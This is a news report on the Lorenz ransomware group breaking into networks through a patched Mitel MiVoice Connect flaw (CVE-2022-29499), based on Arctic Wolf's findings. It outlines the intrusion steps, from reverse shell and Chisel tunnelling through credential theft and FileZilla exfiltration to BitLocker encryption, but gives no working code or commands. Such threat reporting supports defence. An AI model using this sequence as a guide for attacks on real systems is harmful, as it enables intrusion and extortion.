A now-patched significant security hole in Mitel MiVoice Connect has been used by the Lornenz ransomware operations. The operators used it to gain access to target environments for subsequent destructive actions.

Researchers from cybersecurity company Arctic Wolf stated in a report released this week. It says that the “first malicious activity emanated from a Mitel appliance located on the network perimeter.”

“Lorenz utilized Chisel as a tunneling tool to pivot into the environment after exploiting CVE-2022-29499. This is a remote code execution vulnerability affecting the Mitel Service Appliance component of MiVoice Connect.”

Since at least February 2021, Lorenz, like many other ransomware gangs, has targeted small and medium-sized businesses (SMBs) in the United States, and to a lesser extent in China and Mexico. Lorenz is notorious for double extortion by exfiltrating data before encrypting systems.

Cybereason described Lorenz as an “ever-evolving ransomware” and said it was “believed to be a rebranding of the .sZ40 malware found in October 2020”.

Mitel VoIP appliances are being weaponized for ransomware attacks, which is consistent with recent research from CrowdStrike. It revealed details of a ransomware infiltration attempt that used the same technique to obtain remote code execution against an undisclosed target.

The Issues

Given that there are approximately 20,000 internet-exposed devices online, according to security expert Kevin Beaumont. This made it susceptible to malicious assaults, Mitel VoIP solutions are also a lucrative entry point.

The threat actors used the remote code execution bug in one Lorenz ransomware attack that Arctic Wolf looked at to create a reverse shell. Also, they download the Chisel proxy tool.

This suggests that either the threat actors were able to enable the initial access themselves. It was done so with the assistance of an initial access broker (IAB) who is in possession of a CVE-2022-29499 exploit.

It’s also noteworthy that the Lorenz gang delayed performing post-exploitation activities. These are such as establishing persistence via a web shell, harvesting credentials, network reconnaissance, privilege escalation, and lateral movement, for almost a month after gaining initial access.

The attack ultimately resulted in data exfiltration using FileZilla, and the hosts were then encrypted using Microsoft’s BitLocker service. Also, highlights the ongoing exploitation of LOLBINs by adversaries.

The researchers noted that “monitoring simply important assets is not enough for enterprises. Additionally said that “security teams should monitor all externally facing devices, including VoIP and IoT devices, for potential malicious activity”.

Threat actors are starting to target less well-known or closely watched assets to evade detection.

Reference